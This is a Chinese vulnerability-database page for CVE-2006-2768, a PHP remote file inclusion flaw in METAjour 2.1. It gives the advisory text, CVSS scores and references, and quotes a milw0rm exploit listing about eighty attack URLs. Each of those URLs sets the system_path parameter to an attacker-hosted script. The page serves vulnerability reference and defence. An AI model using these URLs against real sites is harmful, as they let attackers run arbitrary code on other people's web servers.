CVE-2006-2768
CVSS5.1
发布时间 :2006-06-02 06:18:00
修订时间 :2011-03-07 21:36:59
NMCOE    

[原文]PHP remote file inclusion vulnerability in METAjour 2.1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via the (1) system_path parameter in a large number of files in the (a) app/edocument/, (b) app/eproject/, (c) app/erek/, and (d) extension/ directories, and the (2) GLOBALS[system_path] parameter in (e) extension/sitemap/sitemap.datatype.php.


[CNNVD]METAjour 多个远程文件包含漏洞(CNNVD-200606-066)

        METAjour 存在PHP远程文件包含漏洞,当register_globals启动时,远程攻击者可通过在(a)app/edocument/,(b)app/eproject/,(c)app/erek/和(d)extension/目录中的大量文件内的(1)system_path参数和在内(e)extension/sitemap/sitemap.datatype.php中的(2)GLOBALS[system_path]参数来执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2768
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2768
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-066
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2077
(UNKNOWN)  VUPEN  ADV-2006-2077
http://www.securityfocus.com/bid/18211
(UNKNOWN)  BID  18211
http://secunia.com/advisories/20404
(VENDOR_ADVISORY)  SECUNIA  20404
http://milw0rm.com/exploits/1855
(UNKNOWN)  MILW0RM  1855
http://xforce.iss.net/xforce/xfdb/26892
(UNKNOWN)  XF  metajour-systempath-file-include(26892)

- 漏洞信息

METAjour 多个远程文件包含漏洞
中危 输入验证
2006-06-02 00:00:00 2006-06-02 00:00:00
远程  
        METAjour 存在PHP远程文件包含漏洞,当register_globals启动时,远程攻击者可通过在(a)app/edocument/,(b)app/eproject/,(c)app/erek/和(d)extension/目录中的大量文件内的(1)system_path参数和在内(e)extension/sitemap/sitemap.datatype.php中的(2)GLOBALS[system_path]参数来执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1855)

metajour 2.1 (system_path) Remote File Include Vulnerabilities (EDBID:1855)
php webapps
2006-05-31 Verified
0 Kacper
N/A [点击下载]
################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# metajour 2.1 (system_path) - Remote File Include Vulnerabilities
# Script site: http://www.metajour.org
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi ;-)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################
expl:

http://www.site.com/[metajour_path]/app/edocument/edocument_basic_view_menu.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/edocument_document_model_create.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/edocument_document_view_list.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listactive.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listclosed.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/core/edocument_edoccorrectionclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocerrorcodeclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocformclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocresponsibleclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_basic_view_menu.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_layoutelement_view_init.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_project_model_create.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_combi.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_create.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listactive.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listclosed.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_projectelement_model_update.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutelementclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectelementclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_basic_view_menu.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseawait.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseclose.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_model_casedone.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseopen.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_model_create.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_combi.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_create.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listactive.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listawait.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listclosed.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listdone.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_search.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compcauseclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compcountryclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compdecisionclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compdepartmentclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compsolutionclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compunitclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/basicextension.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/article/article.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/article/article.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/breadcrumb/breadcrumb.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/bulletinboard/bulletinboard.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/cform/cform.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/cform/cform.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/changepassword/changepassword.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/filelist/filelist.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/filelist/filelist.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/forgottenpassword/forgottenpassword.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/forum/forum.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/forum/forum.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/forum/forumdata.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/gallery/gallery.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/gallery/gallery.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/index/index.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/indexadv/indexadv.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listcomment/listcomment.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listing/listing.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listing/listing.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listing/listing_view_combidialog.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listlatestdoc/listlatestdoc.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listpopulardoc/listpopulardoc.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/login/login.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/menu/menu.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/online/online.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/register/register.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/related/related.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/search/search.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/search/search.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/shop/shop.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/sitemap/sitemap.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/sitemap/sitemap.datatype.php?GLOBALS[system_path]=[evil_scripts]
http://www.site.com/[metajour_path]/extension/slide/slide.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/uptodate/uptodate.class.php?system_path=[evil_scripts]

#Elo ;-)

# milw0rm.com [2006-05-31]
		

- 漏洞信息

39401
METAjour uptodate.class.php system_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

METAjour contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'uptodate.class.php' not properly sanitizing user input supplied to the 'system_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-05-31 Unknow
2006-05-31 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站